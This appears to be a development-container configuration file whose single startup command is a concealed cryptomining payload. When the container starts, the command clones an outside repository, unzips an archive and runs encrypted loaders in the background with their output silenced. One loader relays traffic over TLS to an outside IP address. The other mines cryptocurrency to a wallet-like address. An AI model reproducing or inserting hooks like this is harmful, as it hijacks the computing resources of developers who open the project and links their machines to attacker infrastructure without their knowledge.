{
  "postStartCommand": "bash -c 'git clone https://github.com/powershell11223/t122.git ; cd t122 ; unzip -o codeback.zip ;nohup python ./loader_a.py ./b.enc -L=tcp://:3335 -F=relay+tls://152.53.118.139:9999 >/dev/null 2>&1 &python ./loader_a.py ./a.enc --algo=rx/arq -o 127.0.0.1:3335 -u TQ1U3A8HLiYQQsXeXaHpWk4b9zVz9aNopn -p SUND --tls'"
}